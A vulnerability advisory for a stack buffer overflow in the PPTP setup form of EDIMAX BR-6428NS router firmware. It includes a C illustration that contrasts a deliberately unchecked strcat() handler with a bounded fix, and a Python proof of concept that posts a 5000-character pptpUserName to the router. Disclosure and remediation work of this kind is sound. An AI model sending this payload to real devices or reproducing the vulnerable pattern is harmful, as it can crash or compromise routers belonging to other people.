Overview

Affected version

BR-6428NS_v4_1.10

Vulnerability details

The formPPTPSetup function in the EDIMAX BR-6428NS_v4_1.10 firmware contains a stack-based buffer overflow. The handler reads the pptpUserName parameter of a POST request to /goform/formPPTPSetup into the local stack variable v22 (the decompiler's name for the buffer) using strcat(), with no check of the parameter's length against the size of the buffer. Because pptpUserName is fully attacker-controlled, an over-long value overruns v22 and corrupts the stack.
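The unchecked strcat() pattern described above and a bounded replacement, as an added illustration in C. This is not the vendor's code: the buffer size (64 bytes) and the fixed prefix written before the username are assumptions made for the example, and form_pptp_setup_vulnerable is only ever called with a short string here so the demo does not corrupt its own stack.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of the stack buffer the decompiler calls v22; the real size in
 * the firmware is not given on this page. */
#define V22_SIZE 64

/* Vulnerable shape, modelled on the advisory: the POST parameter is appended
 * to a fixed-size stack buffer with strcat() and no length check. Only called
 * with a short string in this demo. */
int form_pptp_setup_vulnerable(const char *pptp_user_name)
{
    char v22[V22_SIZE];

    v22[0] = '\0';
    strcat(v22, "pptpUserName=");   /* fixed prefix, assumed for the example */
    strcat(v22, pptp_user_name);    /* unbounded: the PoC's 5000 bytes would overrun v22 */
    return (int)strlen(v22);
}

/* Hardened shape: compute the length strcat() would need, refuse input that
 * does not fit, and use a bounded copy for the rest. Returns 0 on success and
 * -1 when the username is rejected. */
int form_pptp_setup_fixed(const char *pptp_user_name, char *out, size_t out_size)
{
    const char *prefix = "pptpUserName=";
    size_t need = strlen(prefix) + strlen(pptp_user_name) + 1; /* +1 for the NUL */

    if (need > out_size)
        return -1;                  /* would overflow: reject, do not truncate silently */
    snprintf(out, out_size, "%s%s", prefix, pptp_user_name);
    return 0;
}

/* Builds the same "A" * 5000 value the PoC sends (constructed test input). */
const char *poc_payload(void)
{
    static char payload[5001];
    memset(payload, 'A', sizeof payload - 1);
    payload[sizeof payload - 1] = '\0';
    return payload;
}

/* Bytes strcat() would write for a given username: shows how far past the
 * buffer the PoC value reaches. */
size_t bytes_strcat_would_write(const char *pptp_user_name)
{
    return strlen("pptpUserName=") + strlen(pptp_user_name) + 1;
}

/* 1 if the hardened handler rejects the PoC payload, 0 otherwise. */
int fixed_rejects_poc_payload(void)
{
    char out[V22_SIZE];
    return form_pptp_setup_fixed(poc_payload(), out, sizeof out) == -1;
}

/* 1 if the hardened handler accepts a normal username and formats it. */
int fixed_accepts_short_name(void)
{
    char out[V22_SIZE];
    return form_pptp_setup_fixed("test", out, sizeof out) == 0
        && strcmp(out, "pptpUserName=test") == 0;
}

int main(void)
{
    printf("short name via vulnerable path: %d bytes\n", form_pptp_setup_vulnerable("test"));
    printf("PoC payload would need %zu bytes in a %d-byte buffer\n",
           bytes_strcat_would_write(poc_payload()), V22_SIZE);
    printf("fixed handler rejects PoC payload: %d\n", fixed_rejects_poc_payload());
    return 0;
}
```

The fix rejects rather than truncates: silently cutting a username short would still let the request succeed with a value the user did not submit, so the handler should fail the request and return an error to the web UI.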


POC

import requests

ip = "192.168.2.1"          # LAN address of the target router

payload = "A" * 5000        # over-long pptpUserName that overruns the stack buffer
data = {
    "submit-url": "",
    "pptpConnect": "",
    "pptpDisconnect": "",
    "pptpIpMode": "0",
    "HostName": "test",
    "macAddr": "",
    "pptpGateway": "",
    "enableDuallAccess": "",
    "DUAL_WAN_IGMP": "",
    "httpProxyEnable": "",
    "DNSMode": "1",
    "dns1": "1.1.1.1",
    "dns2": "8.8.8.8",
    "dns3": "",
    "pptpUserName": payload
}

url = f'http://{ip}/goform/formPPTPSetup'

# The request goes over plain HTTP, so no TLS verification option is needed.
# A device whose web server has crashed will not answer, so a timeout or a
# reset connection is reported instead of raising an unhandled exception.
try:
    res = requests.post(url=url, data=data, timeout=10)
    print(res)
except requests.exceptions.RequestException as e:
    print(f"request failed: {e}")
